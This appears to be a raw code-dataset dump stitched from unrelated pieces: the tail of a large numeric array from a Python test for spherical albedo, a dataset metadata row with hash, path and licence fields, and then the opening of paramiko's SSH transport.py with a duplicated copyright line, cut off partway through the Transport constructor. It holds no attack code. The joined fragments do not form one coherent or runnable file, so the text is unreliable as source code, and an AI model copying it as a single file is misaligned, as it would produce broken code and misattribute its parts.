0.31534981e-03,
0.27984436e-03,
0.24513889e-03,
0.21121174e-03,
0.17798673e-03,
0.14601613e-03,
0.11531570e-03,
0.85622109e-04,
0.56977922e-04,
0.29328881e-04,
0.23219493e-05,
-0.24609051e-04,
-0.51613693e-04,
-0.78829580e-04,
-0.10677023e-03,
-0.13576847e-03,
-0.16589028e-03,
-0.19740456e-03,
-0.23071076e-03,
-0.26662330e-03,
-0.30694614e-03,
-0.35483547e-03,
-0.41624482e-03,
-0.50326047e-03,
-0.63863368e-03,
-0.86484943e-03,
-0.12584554e-02,
-0.19429043e-02,
-0.30815345e-02,
-0.48037078e-02,
-0.70073316e-02,
-0.90698786e-02,
-0.97764749e-02,
-0.79293735e-02,
-0.35561759e-02,
0.14528841e-02,
0.44905520e-02,
0.43353909e-02,
0.19235054e-02,
-0.88058808e-03,
-0.28684181e-02,
-0.39436910e-02,
-0.46082577e-02,
-0.53751953e-02,
-0.65655066e-02,
-0.84049981e-02,
-0.11191580e-01,
-0.15233751e-01,
-0.20167785e-01,
-0.24146404e-01,
-0.24793619e-01,
-0.21611178e-01,
-0.16357245e-01,
-0.11137053e-01,
0.42571200e-03,
0.48259774e-03,
0.55344484e-03,
0.62578957e-03,
0.69064385e-03,
0.74247847e-03,
0.77967369e-03,
0.80386118e-03,
0.81812969e-03,
0.82533201e-03,
0.82742231e-03,
0.82559290e-03,
0.82059979e-03,
0.81299205e-03,
0.80320571e-03,
0.79159206e-03,
0.77843288e-03,
0.76390296e-03,
0.74805156e-03,
0.73085778e-03,
0.71239163e-03,
0.69290656e-03,
0.67251193e-03,
0.65096776e-03,
0.62812673e-03,
0.60432340e-03,
0.57976606e-03,
0.55436889e-03,
0.52808766e-03,
0.50110236e-03,
0.47373594e-03,
0.44590727e-03,
0.41769189e-03,
0.38944930e-03,
0.36113514e-03,
0.33273242e-03,
0.30424978e-03,
0.27580233e-03,
0.24755922e-03,
0.21969499e-03,
0.19240828e-03,
0.16580452e-03,
0.13966703e-03,
0.11454133e-03,
0.90488385e-04,
0.67134846e-04,
0.44648674e-04,
0.22957218e-04,
0.17676108e-05,
-0.19375148e-04,
-0.40583618e-04,
-0.61928760e-04,
-0.83859930e-04,
-0.10665116e-03,
-0.13027368e-03,
-0.15504849e-03,
-0.18114736e-03,
-0.20928915e-03,
-0.24077985e-03,
-0.27812496e-03,
-0.32568991e-03,
-0.39278640e-03,
-0.49672712e-03,
-0.66978729e-03,
-0.97107701e-03,
-0.14971532e-02,
-0.23801890e-02,
-0.37356641e-02,
-0.55097779e-02,
-0.72345133e-02,
-0.79152975e-02,
-0.64894208e-02,
-0.28653429e-02,
0.13867198e-02,
0.39382749e-02,
0.36805528e-02,
0.15104047e-02,
-0.85980649e-03,
-0.24118538e-02,
-0.31621221e-02,
-0.36013129e-02,
-0.41603735e-02,
-0.50707515e-02,
-0.64725522e-02,
-0.85721835e-02,
-0.11695998e-01,
-0.15934667e-01,
-0.20252047e-01,
-0.22257976e-01,
-0.20039089e-01,
-0.14158701e-01,
-0.70773158e-02,
-0.11583769e-02,
0.32308648e-03,
0.36626059e-03,
0.42002957e-03,
0.47493313e-03,
0.52414869e-03,
0.56347938e-03,
0.59169793e-03,
0.61004912e-03,
0.62088534e-03,
0.62637340e-03,
0.62798650e-03,
0.62661694e-03,
0.62283722e-03,
0.61707193e-03,
0.60965854e-03,
0.60086075e-03,
0.59088779e-03,
0.57988992e-03,
0.56789967e-03,
0.55486214e-03,
0.54083182e-03,
0.52603544e-03,
0.51060918e-03,
0.49428100e-03,
0.47690922e-03,
0.45883877e-03,
0.44021819e-03,
0.42093766e-03,
0.40098530e-03,
0.38046407e-03,
0.35971330e-03,
0.33858226e-03,
0.31714686e-03,
0.29569783e-03,
0.27421847e-03,
0.25265093e-03,
0.23099354e-03,
0.20943003e-03,
0.18794239e-03,
0.16680970e-03,
0.14604363e-03,
0.12587215e-03,
0.10602640e-03,
0.86910019e-04,
0.68677633e-04,
0.50912015e-04,
0.33862842e-04,
0.17410162e-04,
0.13113118e-05,
-0.14745443e-04,
-0.30839601e-04,
-0.47037924e-04,
-0.63687643e-04,
-0.81004437e-04,
-0.98914243e-04,
-0.11776508e-03,
-0.13753906e-03,
-0.15888251e-03,
-0.18270283e-03,
-0.21094215e-03,
-0.24672056e-03,
-0.29703090e-03,
-0.37476781e-03,
-0.50383923e-03,
-0.72860206e-03,
-0.11220841e-02,
-0.17865424e-02,
-0.28166992e-02,
-0.41856705e-02,
-0.55507738e-02,
-0.61370027e-02,
-0.50718379e-02,
-0.22190376e-02,
0.11870584e-02,
0.32180531e-02,
0.29439172e-02,
0.11399792e-02,
-0.75004215e-03,
-0.19179990e-02,
-0.24332437e-02,
-0.27225760e-02,
-0.31262944e-02,
-0.38075345e-02,
-0.48529524e-02,
-0.64000175e-02,
-0.87149860e-02,
-0.12041125e-01,
-0.15928924e-01,
-0.18521670e-01,
-0.17406538e-01,
-0.11980806e-01,
-0.43471926e-02,
0.24430454e-02,
0.64657470e-02,
0.23461202e-03,
0.26596323e-03,
0.30500707e-03,
0.34487346e-03,
0.38060735e-03,
0.40916057e-03,
0.42964329e-03,
0.44296391e-03,
0.45083603e-03,
0.45483361e-03,
0.45601939e-03,
0.45503493e-03,
0.45229631e-03,
0.44811305e-03,
0.44273314e-03,
0.43635038e-03,
0.42911444e-03,
0.42114657e-03,
0.41246001e-03,
0.40299704e-03,
0.39280354e-03,
0.38204770e-03,
0.37087622e-03,
0.35903638e-03,
0.34639766e-03,
0.33326566e-03,
0.31975409e-03,
0.30575541e-03,
0.29127134e-03,
0.27634719e-03,
0.26128866e-03,
0.24593511e-03,
0.23035664e-03,
0.21476793e-03,
0.19919084e-03,
0.18352638e-03,
0.16776577e-03,
0.15213400e-03,
0.13650597e-03,
0.12117127e-03,
0.10604783e-03,
0.91420814e-04,
0.77014876e-04,
0.63102707e-04,
0.49865157e-04,
0.36943147e-04,
0.24579298e-04,
0.12646942e-04,
0.93583714e-06,
-0.10726711e-04,
-0.22409520e-04,
-0.34169330e-04,
-0.46268411e-04,
-0.58847447e-04,
-0.71843184e-04,
-0.85561762e-04,
-0.99899378e-04,
-0.11538975e-03,
-0.13264996e-03,
-0.15311912e-03,
-0.17894371e-03,
-0.21519083e-03,
-0.27111307e-03,
-0.36378118e-03,
-0.52517361e-03,
-0.80816675e-03,
-0.12878858e-02,
-0.20363682e-02,
-0.30407030e-02,
-0.40585143e-02,
-0.45180605e-02,
-0.37541774e-02,
-0.16340034e-02,
0.92716783e-03,
0.24486976e-02,
0.22101640e-02,
0.82245702e-03,
-0.59355749e-03,
-0.14349412e-02,
-0.17818650e-02,
-0.19710022e-02,
-0.22550686e-02,
-0.27460111e-02,
-0.34975049e-02,
-0.45994679e-02,
-0.62465151e-02,
-0.86843111e-02,
-0.11772950e-01,
-0.14247025e-01,
-0.13897673e-01,
-0.95402114e-02,
-0.26456779e-02,
0.37637560e-02,
0.75113312e-02,
0.82785152e-02,
0.16024915e-03,
0.18166313e-03,
0.20833101e-03,
0.23556003e-03,
0.25996531e-03,
0.27946456e-03,
0.29345075e-03,
0.30254686e-03,
0.30792650e-03,
0.31066421e-03,
0.31148014e-03,
0.31080900e-03,
0.30893844e-03,
0.30608277e-03,
0.30241298e-03,
0.29805984e-03,
0.29311786e-03,
0.28767882e-03,
0.28175494e-03,
0.27529473e-03,
0.26832905e-03,
0.26097632e-03,
0.25335979e-03,
0.24527783e-03,
0.23663967e-03,
0.22766842e-03,
0.21843993e-03,
0.20887410e-03,
0.19898124e-03,
0.18877641e-03,
0.17849728e-03,
0.16801062e-03,
0.15736978e-03,
0.14671541e-03,
0.13608270e-03,
0.12537625e-03,
0.11459773e-03,
0.10394175e-03,
0.93250273e-04,
0.82784871e-04,
0.72433824e-04,
0.62449340e-04,
0.52622323e-04,
0.43097367e-04,
0.34058194e-04,
0.25217514e-04,
0.16786646e-04,
0.86424679e-05,
0.63486573e-06,
-0.73354054e-05,
-0.15307762e-04,
-0.23343211e-04,
-0.31608852e-04,
-0.40205730e-04,
-0.49073769e-04,
-0.58462469e-04,
-0.68241599e-04,
-0.78819096e-04,
-0.90594622e-04,
-0.10456181e-03,
-0.12214016e-03,
-0.14677636e-03,
-0.18476187e-03,
-0.24763195e-03,
-0.35712289e-03,
-0.54928858e-03,
-0.87579578e-03,
-0.13871513e-02,
-0.20772433e-02,
-0.27833104e-02,
-0.31113259e-02,
-0.25939168e-02,
-0.11258019e-02,
0.66039932e-03,
0.17193498e-02,
0.15396239e-02,
0.55894168e-03,
-0.42620959e-03,
-0.99759083e-03,
-0.12229718e-02,
-0.13435301e-02,
-0.15339972e-02,
-0.18679998e-02,
-0.23784370e-02,
-0.31225604e-02,
-0.42320755e-02,
-0.58987723e-02,
-0.81079528e-02,
-0.10059725e-01,
-0.10070107e-01,
-0.69461395e-02,
-0.15970924e-02,
0.35173711e-02,
0.64823525e-02,
0.69939806e-02,
0.58447313e-02,
0.99998928e-04,
0.11336149e-03,
0.13000234e-03,
0.14699313e-03,
0.16222145e-03,
0.17438777e-03,
0.18311353e-03,
0.18878833e-03,
0.19214548e-03,
0.19385564e-03,
0.19436714e-03,
0.19395056e-03,
0.19278521e-03,
0.19100346e-03,
0.18871219e-03,
0.18599514e-03,
0.18291226e-03,
0.17952279e-03,
0.17582905e-03,
0.17179834e-03,
0.16745202e-03,
0.16285951e-03,
0.15811202e-03,
0.15307403e-03,
0.14767774e-03,
0.14207418e-03,
0.13631718e-03,
0.13035099e-03,
0.12418116e-03,
0.11780974e-03,
0.11139606e-03,
0.10484913e-03,
0.98205564e-04,
0.91553651e-04,
0.84926301e-04,
0.78246710e-04,
0.71511990e-04,
0.64868305e-04,
0.58195605e-04,
0.51666491e-04,
0.45197361e-04,
0.38973347e-04,
0.32842243e-04,
0.26893933e-04,
0.21249898e-04,
0.15730866e-04,
0.10472757e-04,
0.53960257e-05,
0.39317513e-06,
-0.45791730e-05,
-0.95536843e-05,
-0.14566379e-04,
-0.19728041e-04,
-0.25091455e-04,
-0.30624815e-04,
-0.36488018e-04,
-0.42586758e-04,
-0.49185081e-04,
-0.56528501e-04,
-0.65242508e-04,
-0.76187855e-04,
-0.91523340e-04,
-0.11515653e-03,
-0.15424404e-03,
-0.22232164e-03,
-0.34186023e-03,
-0.54521387e-03,
-0.86433312e-03,
-0.12963127e-02,
-0.17405468e-02,
-0.19500151e-02,
-0.16286803e-02,
-0.70585759e-03,
0.42125979e-03,
0.10887617e-02,
0.97085984e-03,
0.34771912e-03,
-0.27306599e-03,
-0.62840234e-03,
-0.76508470e-03,
-0.83742116e-03,
-0.95511600e-03,
-0.11631359e-02,
-0.14807530e-02,
-0.19422875e-02,
-0.26292126e-02,
-0.36683388e-02,
-0.50780545e-02,
-0.63869823e-02,
-0.64897770e-02,
-0.44976156e-02,
-0.92731958e-03,
0.25404119e-02,
0.45405924e-02,
0.48503033e-02,
0.40294230e-02,
0.27683314e-02,
0.53884014e-04,
0.61084211e-04,
0.70050810e-04,
0.79205915e-04,
0.87411223e-04,
0.93966446e-04,
0.98667610e-04,
0.10172475e-03,
0.10353317e-03,
0.10445446e-03,
0.10473084e-03,
0.10450836e-03,
0.10388237e-03,
0.10292211e-03,
0.10168495e-03,
0.10021854e-03,
0.98558390e-04,
0.96735770e-04,
0.94745832e-04,
0.92573500e-04,
0.90232592e-04,
0.87755776e-04,
0.85199157e-04,
0.82488186e-04,
0.79575933e-04,
0.76551951e-04,
0.73451745e-04,
0.70241033e-04,
0.66919587e-04,
0.63485968e-04,
0.60029004e-04,
0.56497996e-04,
0.52914555e-04,
0.49328813e-04,
0.45763074e-04,
0.42167223e-04,
0.38533406e-04,
0.34952976e-04,
0.31360858e-04,
0.27841659e-04,
0.24351986e-04,
0.21002805e-04,
0.17696189e-04,
0.14492869e-04,
0.11447947e-04,
0.84757721e-05,
0.56412364e-05,
0.29090747e-05,
0.20986288e-06,
-0.24671158e-05,
-0.51494958e-05,
-0.78480261e-05,
-0.10632524e-04,
-0.13520086e-04,
-0.16503614e-04,
-0.19662311e-04,
-0.22948981e-04,
-0.26503118e-04,
-0.30458663e-04,
-0.35155379e-04,
-0.41044819e-04,
-0.49301310e-04,
-0.62018436e-04,
-0.83043000e-04,
-0.11966786e-03,
-0.18399033e-03,
-0.29346853e-03,
-0.46542627e-03,
-0.69852220e-03,
-0.93878357e-03,
-0.10528294e-02,
-0.88006578e-03,
-0.38117066e-03,
0.22924476e-03,
0.59057289e-03,
0.52561943e-03,
0.18708916e-03,
-0.14889365e-03,
-0.34005527e-03,
-0.41272707e-03,
-0.45099761e-03,
-0.51413663e-03,
-0.62613422e-03,
-0.79706579e-03,
-0.10450790e-02,
-0.14138672e-02,
-0.19733894e-02,
-0.27403242e-02,
-0.34682453e-02,
-0.35488785e-02,
-0.24659703e-02,
-0.48296375e-03,
0.14571503e-02,
0.25734871e-02,
0.27371510e-02,
0.22676513e-02,
0.15553402e-02,
0.87312493e-03,
0.21932714e-04,
0.24863417e-04,
0.28513090e-04,
0.32239484e-04,
0.35579265e-04,
0.38247381e-04,
0.40160809e-04,
0.41405037e-04,
0.42140975e-04,
0.42515869e-04,
0.42628493e-04,
0.42538381e-04,
0.42284017e-04,
0.41893109e-04,
0.41388936e-04,
0.40791474e-04,
0.40115974e-04,
0.39374940e-04,
0.38564984e-04,
0.37680649e-04,
0.36728081e-04,
0.35719502e-04,
0.34679109e-04,
0.33576438e-04,
0.32390075e-04,
0.31158215e-04,
0.29896764e-04,
0.28590852e-04,
0.27239597e-04,
0.25841982e-04,
0.24434608e-04,
0.22996630e-04,
0.21537227e-04,
0.20077452e-04,
0.18627210e-04,
0.17164399e-04,
0.15684327e-04,
0.14226660e-04,
0.12765439e-04,
0.11332698e-04,
0.99115950e-05,
0.85493384e-05,
0.72026537e-05,
0.58994046e-05,
0.46591872e-05,
0.34499117e-05,
0.22957561e-05,
0.11843766e-05,
0.84998014e-07,
-0.10040685e-05,
-0.20963864e-05,
-0.31941836e-05,
-0.43282666e-05,
-0.55030100e-05,
-0.67179099e-05,
-0.80033133e-05,
-0.93413128e-05,
-0.10787697e-04,
-0.12397514e-04,
-0.14309594e-04,
-0.16705344e-04,
-0.20065328e-04,
-0.25239178e-04,
-0.33791446e-04,
-0.48691152e-04,
-0.74860320e-04,
-0.11940804e-03,
-0.18940083e-03,
-0.28432420e-03,
-0.38224252e-03,
-0.42882701e-03,
-0.35856038e-03,
-0.15526464e-03,
0.93624702e-04,
0.24092782e-03,
0.21429047e-03,
0.76112388e-04,
-0.60849816e-04,
-0.13861567e-03,
-0.16805886e-03,
-0.18353794e-03,
-0.20919893e-03,
-0.25477342e-03,
-0.32431912e-03,
-0.42517454e-03,
-0.57509379e-03,
-0.80277218e-03,
-0.11159416e-02,
-0.14153966e-02,
-0.14518298e-02,
-0.10097986e-02,
-0.19427406e-03,
0.60561736e-03,
0.10654813e-02,
0.11315914e-02,
0.93659549e-03,
0.64201583e-03,
0.36030522e-03,
0.14866883e-03,
0.41634707e-05,
0.47198023e-05,
0.54126149e-05,
0.61199912e-05,
0.67539763e-05,
0.72604594e-05,
0.76236788e-05,
0.78598650e-05,
0.79995607e-05,
0.80707214e-05,
0.80921054e-05,
0.80750178e-05,
0.80267509e-05,
0.79525425e-05,
0.78568110e-05,
0.77433706e-05,
0.76151509e-05,
0.74745158e-05,
0.73207625e-05,
0.71528843e-05,
0.69720704e-05,
0.67805959e-05,
0.65831077e-05,
0.63738212e-05,
0.61485744e-05,
0.59146905e-05,
0.56752488e-05,
0.54273883e-05,
0.51709094e-05,
0.49056021e-05,
0.46384298e-05,
0.43654286e-05,
0.40883574e-05,
0.38112394e-05,
0.35359881e-05,
0.32583384e-05,
0.29773378e-05,
0.27006156e-05,
0.24232718e-05,
0.21512824e-05,
0.18814886e-05,
0.16229329e-05,
0.13672592e-05,
0.11198919e-05,
0.88442783e-06,
0.65489411e-06,
0.43578387e-06,
0.22484058e-06,
0.16117639e-07,
-0.19059540e-06,
-0.39797052e-06,
-0.60633920e-06,
-0.82165008e-06,
-0.10446255e-05,
-0.12752704e-05,
-0.15192638e-05,
-0.17732648e-05,
-0.20478196e-05,
-0.23534012e-05,
-0.27163851e-05,
-0.31711115e-05,
-0.38089131e-05,
-0.47909707e-05,
-0.64142382e-05,
-0.92423534e-05,
-0.14209581e-04,
-0.22665536e-04,
-0.35952206e-04,
-0.53973064e-04,
-0.72565315e-04,
-0.81414371e-04,
-0.68077694e-04,
-0.29477938e-04,
0.17784128e-04,
0.45754921e-04,
0.40691128e-04,
0.14446910e-04,
-0.11559983e-04,
-0.26320620e-04,
-0.31904819e-04,
-0.34839621e-04,
-0.39709423e-04,
-0.48360336e-04,
-0.61561077e-04,
-0.80702943e-04,
-0.10915505e-03,
-0.15237252e-03,
-0.21185735e-03,
-0.26881794e-03,
-0.27586648e-03,
-0.19191137e-03,
-0.36795147e-04,
0.11542100e-03,
0.20291690e-03,
0.21544744e-03,
0.17828873e-03,
0.12219916e-03,
0.68575428e-04,
0.28294970e-04,
0.53851386e-05,
]
)
return spherical_albedo, albedo, expected_r1
| true | true |
f72eebafad7228c74cea213d49c8f2565bcb055c | 112,270 | py | Python | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 12 | 2018-07-18T05:45:18.000Z | 2020-02-19T21:27:33.000Z | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 6 | 2019-02-20T00:42:29.000Z | 2020-08-08T17:01:43.000Z | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Core protocol implementation
"""
from __future__ import print_function
import os
import socket
import sys
import threading
import time
import weakref
from hashlib import md5, sha1, sha256, sha512
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import algorithms, Cipher, modes
import paramiko
from paramiko import util
from paramiko.auth_handler import AuthHandler
from paramiko.ssh_gss import GSSAuth
from paramiko.channel import Channel
from paramiko.common import (
xffffffff,
cMSG_CHANNEL_OPEN,
cMSG_IGNORE,
cMSG_GLOBAL_REQUEST,
DEBUG,
MSG_KEXINIT,
MSG_IGNORE,
MSG_DISCONNECT,
MSG_DEBUG,
ERROR,
WARNING,
cMSG_UNIMPLEMENTED,
INFO,
cMSG_KEXINIT,
cMSG_NEWKEYS,
MSG_NEWKEYS,
cMSG_REQUEST_SUCCESS,
cMSG_REQUEST_FAILURE,
CONNECTION_FAILED_CODE,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
OPEN_SUCCEEDED,
cMSG_CHANNEL_OPEN_FAILURE,
cMSG_CHANNEL_OPEN_SUCCESS,
MSG_GLOBAL_REQUEST,
MSG_REQUEST_SUCCESS,
MSG_REQUEST_FAILURE,
MSG_CHANNEL_OPEN_SUCCESS,
MSG_CHANNEL_OPEN_FAILURE,
MSG_CHANNEL_OPEN,
MSG_CHANNEL_SUCCESS,
MSG_CHANNEL_FAILURE,
MSG_CHANNEL_DATA,
MSG_CHANNEL_EXTENDED_DATA,
MSG_CHANNEL_WINDOW_ADJUST,
MSG_CHANNEL_REQUEST,
MSG_CHANNEL_EOF,
MSG_CHANNEL_CLOSE,
MIN_WINDOW_SIZE,
MIN_PACKET_SIZE,
MAX_WINDOW_SIZE,
DEFAULT_WINDOW_SIZE,
DEFAULT_MAX_PACKET_SIZE,
HIGHEST_USERAUTH_MESSAGE_ID,
MSG_UNIMPLEMENTED,
MSG_NAMES,
)
from paramiko.compress import ZlibCompressor, ZlibDecompressor
from paramiko.dsskey import DSSKey
from paramiko.ed25519key import Ed25519Key
from paramiko.kex_gex import KexGex, KexGexSHA256
from paramiko.kex_group1 import KexGroup1
from paramiko.kex_group14 import KexGroup14
from paramiko.kex_ecdh_nist import KexNistp256, KexNistp384, KexNistp521
from paramiko.kex_gss import KexGSSGex, KexGSSGroup1, KexGSSGroup14
from paramiko.message import Message
from paramiko.packet import Packetizer, NeedRekeyException
from paramiko.primes import ModulusPack
from paramiko.py3compat import string_types, long, byte_ord, b, input, PY2
from paramiko.rsakey import RSAKey
from paramiko.ecdsakey import ECDSAKey
from paramiko.server import ServerInterface
from paramiko.sftp_client import SFTPClient
from paramiko.ssh_exception import (
SSHException,
BadAuthenticationType,
ChannelException,
ProxyCommandFailure,
)
from paramiko.util import retry_on_signal, ClosingContextManager, clamp_value
# for thread cleanup
_active_threads = []
def _join_lingering_threads():
for thr in _active_threads:
thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class Transport(threading.Thread, ClosingContextManager):
"""
An SSH Transport attaches to a stream (usually a socket), negotiates an
encrypted session, authenticates, and then creates stream tunnels, called
`channels <.Channel>`, across the session. Multiple channels can be
multiplexed across a single session (and often are, in the case of port
forwardings).
Instances of this class may be used as context managers.
"""
_ENCRYPT = object()
_DECRYPT = object()
_PROTO_ID = "2.0"
_CLIENT_ID = "paramiko_{}".format(paramiko.__version__)
# These tuples of algorithm identifiers are in preference order; do not
# reorder without reason!
_preferred_ciphers = (
"aes128-ctr",
"aes192-ctr",
"aes256-ctr",
"aes128-cbc",
"aes192-cbc",
"aes256-cbc",
"blowfish-cbc",
"3des-cbc",
)
_preferred_macs = (
"hmac-sha2-256",
"hmac-sha2-512",
"hmac-sha1",
"hmac-md5",
"hmac-sha1-96",
"hmac-md5-96",
)
_preferred_keys = (
"ssh-ed25519",
"ecdsa-sha2-nistp256",
"ecdsa-sha2-nistp384",
"ecdsa-sha2-nistp521",
"ssh-rsa",
"ssh-dss",
)
_preferred_kex = (
"ecdh-sha2-nistp256",
"ecdh-sha2-nistp384",
"ecdh-sha2-nistp521",
"diffie-hellman-group-exchange-sha256",
"diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1",
)
_preferred_gsskex = (
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==",
)
_preferred_compression = ("none",)
_cipher_info = {
"aes128-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 16,
},
"aes192-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 24,
},
"aes256-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 32,
},
"blowfish-cbc": {
"class": algorithms.Blowfish,
"mode": modes.CBC,
"block-size": 8,
"key-size": 16,
},
"aes128-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 16,
},
"aes192-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 24,
},
"aes256-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 32,
},
"3des-cbc": {
"class": algorithms.TripleDES,
"mode": modes.CBC,
"block-size": 8,
"key-size": 24,
},
}
_mac_info = {
"hmac-sha1": {"class": sha1, "size": 20},
"hmac-sha1-96": {"class": sha1, "size": 12},
"hmac-sha2-256": {"class": sha256, "size": 32},
"hmac-sha2-512": {"class": sha512, "size": 64},
"hmac-md5": {"class": md5, "size": 16},
"hmac-md5-96": {"class": md5, "size": 12},
}
_key_info = {
"ssh-rsa": RSAKey,
"ssh-rsa-cert-v01@openssh.com": RSAKey,
"ssh-dss": DSSKey,
"ssh-dss-cert-v01@openssh.com": DSSKey,
"ecdsa-sha2-nistp256": ECDSAKey,
"ecdsa-sha2-nistp256-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp384": ECDSAKey,
"ecdsa-sha2-nistp384-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp521": ECDSAKey,
"ecdsa-sha2-nistp521-cert-v01@openssh.com": ECDSAKey,
"ssh-ed25519": Ed25519Key,
"ssh-ed25519-cert-v01@openssh.com": Ed25519Key,
}
_kex_info = {
"diffie-hellman-group1-sha1": KexGroup1,
"diffie-hellman-group14-sha1": KexGroup14,
"diffie-hellman-group-exchange-sha1": KexGex,
"diffie-hellman-group-exchange-sha256": KexGexSHA256,
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup1,
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup14,
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGex,
"ecdh-sha2-nistp256": KexNistp256,
"ecdh-sha2-nistp384": KexNistp384,
"ecdh-sha2-nistp521": KexNistp521,
}
_compression_info = {
# zlib@openssh.com is just zlib, but only turned on after a successful
# authentication. openssh servers may only offer this type because
# they've had troubles with security holes in zlib in the past.
"zlib@openssh.com": (ZlibCompressor, ZlibDecompressor),
"zlib": (ZlibCompressor, ZlibDecompressor),
"none": (None, None),
}
_modulus_pack = None
_active_check_timeout = 0.1
def __init__(
self,
sock,
default_window_size=DEFAULT_WINDOW_SIZE,
default_max_packet_size=DEFAULT_MAX_PACKET_SIZE,
gss_kex=False,
gss_deleg_creds=True,
):
"""
Create a new SSH session over an existing socket, or socket-like
object. This only creates the `.Transport` object; it doesn't begin
the SSH session yet. Use `connect` or `start_client` to begin a client
session, or `start_server` to begin a server session.
If the object is not actually a socket, it must have the following
methods:
- ``send(str)``: Writes from 1 to ``len(str)`` bytes, and returns an
int representing the number of bytes written. Returns
0 or raises ``EOFError`` if the stream has been closed.
- ``recv(int)``: Reads from 1 to ``int`` bytes and returns them as a
string. Returns 0 or raises ``EOFError`` if the stream has been
closed.
- ``close()``: Closes the socket.
- ``settimeout(n)``: Sets a (float) timeout on I/O operations.
For ease of use, you may also pass in an address (as a tuple) or a host
string as the ``sock`` argument. (A host string is a hostname with an
optional port (separated by ``":"``) which will be converted into a
tuple of ``(hostname, port)``.) A socket will be connected to this
address and used for communication. Exceptions from the ``socket``
call may be thrown in this case.
.. note::
Modifying the the window and packet sizes might have adverse
effects on your channels created from this transport. The default
values are the same as in the OpenSSH code base and have been
battle tested.
:param socket sock:
a socket or socket-like object to create the session over.
:param int default_window_size:
sets the default window size on the transport. (defaults to
2097152)
:param int default_max_packet_size:
sets the default max packet size on the transport. (defaults to
32768)
.. versionchanged:: 1.15
Added the ``default_window_size`` and ``default_max_packet_size``
arguments.
"""
self.active = False
self.hostname = None
if isinstance(sock, string_types):
# convert "host:port" into (host, port)
hl = sock.split(":", 1)
self.hostname = hl[0]
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
self.hostname = hostname
reason = "No suitable address family"
addrinfos = socket.getaddrinfo(
hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM
)
for family, socktype, proto, canonname, sockaddr in addrinfos:
if socktype == socket.SOCK_STREAM:
af = family
# addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error as e:
reason = str(e)
else:
break
else:
raise SSHException(
"Unable to connect to {}: {}".format(hostname, reason)
)
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.sock = sock
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never propagated.
self.sock.settimeout(self._active_check_timeout)
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = "SSH-" + self._PROTO_ID + "-" + self._CLIENT_ID
self.remote_version = ""
self.local_cipher = self.remote_cipher = ""
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# GSS-API / SSPI Key Exchange
self.use_gss_kex = gss_kex
# This will be set to True if GSS-API Key Exchange was performed
self.gss_kex_used = False
self.kexgss_ctxt = None
self.gss_host = None
if self.use_gss_kex:
self.kexgss_ctxt = GSSAuth("gssapi-keyex", gss_deleg_creds)
self._preferred_kex = self._preferred_gsskex + self._preferred_kex
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
# synchronization (always higher level than write_lock)
self.lock = threading.Lock()
# tracking open channels
self._channels = ChannelMap()
self.channel_events = {} # (id -> Event)
self.channels_seen = {} # (id -> True)
self._channel_counter = 0
self.default_max_packet_size = default_max_packet_size
self.default_window_size = default_window_size
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = "paramiko.transport"
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
